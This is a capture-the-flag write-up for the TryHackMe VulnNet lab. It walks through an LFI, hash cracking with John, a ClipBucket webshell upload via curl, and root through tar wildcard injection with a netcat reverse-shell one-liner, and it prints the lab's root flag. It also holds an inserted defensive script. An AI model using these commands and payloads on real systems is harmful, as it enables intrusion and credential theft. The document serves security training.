TryHackMe - Vulnet Writeup

tags: writeup tryhackme vulnet medium

Port Scanning

nmap -sC -sV -v -p- -T4 -oN Ports 10.10.124.152

There are two open ports:

  • Port 22 : Default port for Secure Shell. Secure Protocol and encrypted data. Service name is OpenSSH and version is 7.6p1
  • Port 80 : Default HTTP port. Apache is the web server and the version is httpd 2.4.29

Enumeration

Fuzzing HTTP Service

Since HTTP is the only web service available, while we look at the page we also fuzz it for interesting directories. In this case I use ffuf, which is written in Go and makes the fuzzing much faster.

ffuf -u "http://vulnnet.thm/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404 -t 50

Ffuf Explanation

  • The -u flag indicates the URL of the web page.
  • The -w flag indicates the wordlist we are going to use for fuzzing.
  • The -fc flag filters out the status codes you specify.
  • The -t flag sets the number of threads fuzzing at the same time. In this case I use 50 for a CTF; with higher values like 100 or 150 you may start to see false responses.

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://vulnnet.thm/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 404
________________________________________________

                        [Status: 200, Size: 5829, Words: 1689, Lines: 142]
# directory-list-2.3-medium.txt [Status: 200, Size: 5829, Words: 1689, Lines: 142]
img                     [Status: 301, Size: 308, Words: 20, Lines: 10]
#                       [Status: 200, Size: 5829, Words: 1689, Lines: 142]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10]
                        [Status: 200, Size: 5829, Words: 1689, Lines: 142]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220560/220560] :: Job [1/1] :: 795 req/sec :: Duration: [0:05:07] :: Errors: 0 ::                                          

Subdirectory Enumeration

The js subdirectory looks interesting: inside it there are two obfuscated JavaScript files.

Exploitation

JavaScript Deobfuscation

To deobfuscate JavaScript files we can use an online deobfuscator like this one.

In the first JS file we can see this parameter:

return n.d(t, "a", t), t; }, n.o = function (e, t) { return Object.prototype.hasOwnProperty.call(e, t); }, n.p = "http://vulnnet.thm/index.php?referer=", n(n.s = 0); }({0: function (e, t, n)

In the second JS file we can see a subdomain:

t.o = function (a, e) { return Object.prototype.hasOwnProperty.call(a, e); }, t.p = "http://broadcast.vulnnet.thm", t(t.s = 0); }({0: function (a, e, t) { a.exports = t("WdQY"); }, WdQY: function (a, e, t) { "use strict";

Now we know there is an LFI (the referer parameter) and another application on a subdomain; let's look inside it.

To browse the subdomain we have to add it to /etc/hosts:

echo "10.10.32.192 broadcast.vulnnet.thm" >> /etc/hosts

When you open the subdomain it asks for a password.

To find it we have to locate the .htaccess file for broadcast.vulnnet.thm.

As the server is Apache, we look at the default apache2 configuration, which is:

/etc/apache2/sites-enabled/000-default.conf

To read the file we use the LFI and view the page source, so the URL looks like this:

view-source:http://vulnnet.thm/?referer=/etc/apache2/sites-enabled/000-default.conf

As you can see, this reveals the path of the .htpasswd file:

/etc/apache2/.htpasswd

Following the same method we find a user and a hashed password:

developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0

Cracking password hashes with John

Write the hash into a file with this command (single quotes, so the shell does not expand the $ fields of the hash):

echo '$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0' > hash

Now we use John: go to the directory containing the hash file and run it against the wordlist.

john hash --wordlist=/usr/share/wordlists/rockyou.txt

We now use the cracked password to log in to the subdomain:

developers : (crackedpasswd)

Inside the Subdomain

When you enter the site you can see it is a ClipBucket web application, and if you view the source code you can see its version.

And if you search exploit-db you can find the exploit.

This exploit allows uploading files to ClipBucket, so we prepare a PHP reverse shell. If you are on Kali you can copy the PHP reverse shell from:

/usr/share/webshells/php/php-reverse-shell.php

Copy the webshell to your working directory and edit it with nano to set your VPN IP and listening port.

It looks like this:

Uploading the webshell to Clipbucket

Following the exploit, go to the folder containing the edited webshell, rename it to anyname.php, and upload it:

curl -F "file=@anyname.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<passwd>

Before you execute the webshell start a listener:

nc -nlvp 1234

Next, trigger the webshell by browsing to it under /files; the path will look something like this:

http://broadcast.vulnnet.thm/files/photos/2021/09/02/16306000813aa88a.php

And PWN! We have a reverse shell, but as the www-data user.

If you noticed, I put rlwrap before the nc command; this tool gives the shell more interactivity, but it does not always work, so we have to upgrade to a TTY.


Privesc to User

If you look in the /var/backups directory you will find the file ssh-backup.tar.gz.

To extract it use:

tar xvf ssh-backup.tar.gz

When you extract it you obtain an encrypted private key that you can crack with john, but before john can crack it, it first has to be converted with ssh2john.py:

python /usr/share/john/ssh2john.py id_rsa > crack

After this you should obtain something like this:

Now you can crack this file with john too, using the same command as before but with the new file name:

john crack --wordlist=/usr/share/wordlists/rockyou.txt

Once you crack the file you obtain the passphrase, and you can log in over SSH with the encrypted private key.

ssh -i id_rsa server-management@10.10.43.115

With this, go to server-management's $HOME and cat the user flag.


Root Privesc

To escalate to root I used a Spanish tool called linpeas.

With linpeas i enumerated most of the possible privesc and discovered something interesting on cron.

There, look into backupsrv.sh.

Here we can see a wildcard vulnerability: whenever tar is run with a wildcard, we can create files whose names are parsed as tar options and get executed. More info here.

Create a script called shell.sh inside $HOME/server-management/Documents that contains this:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f

After creating the script, enter these commands in the same directory:

echo > '--checkpoint=1'
echo > '--checkpoint-action=exec=sh shell.sh'

Start a netcat listener and wait a few seconds to receive the root shell.
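As an added example (not from the writeup), here is a hardened stand-in for a cron backup script like backupsrv.sh that archives the directory without a shell wildcard, plus a small audit check for option-looking file names. The real script is not shown on the page, so the directory and archive names are assumptions.

```shell
#!/bin/sh
# Added example, not part of the writeup: a hardened version of the kind of
# cron backup the writeup abuses. backupsrv.sh itself is not shown on the
# page, so the directory and archive names here are placeholders.
set -eu

# Archive the contents of a directory WITHOUT a shell wildcard. tar receives
# a single argument ("."), so a file literally named "--checkpoint=1" inside
# the directory is stored as an ordinary member instead of being parsed as a
# tar option. This is the fix for the tar wildcard issue in the writeup.
safe_backup() {
    src="$1"
    dest="$2"
    tar -cf "$dest" -C "$src" .
}

# Vulnerable pattern for comparison: "tar -cf out.tar *" lets the shell
# expand file names into tar's argument list. Do not use it on directories
# that a less privileged user can write to.

# Audit helper: list entries directly inside a directory whose names begin
# with '-'. In a user-writable directory that a privileged job archives,
# such names are a strong indicator of a wildcard-injection attempt.
find_option_like_names() {
    for f in "$1"/-*; do
        [ -e "$f" ] || continue      # no match: the glob stayed literal
        printf '%s\n' "${f##*/}"
    done
}
```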

cat /root/root.txt
THM{220b671dd8adc301b34c2738ee8295ba}

You can find me on:

  • Twitter
  • Github
  • TryHackMe
  • HackTheBox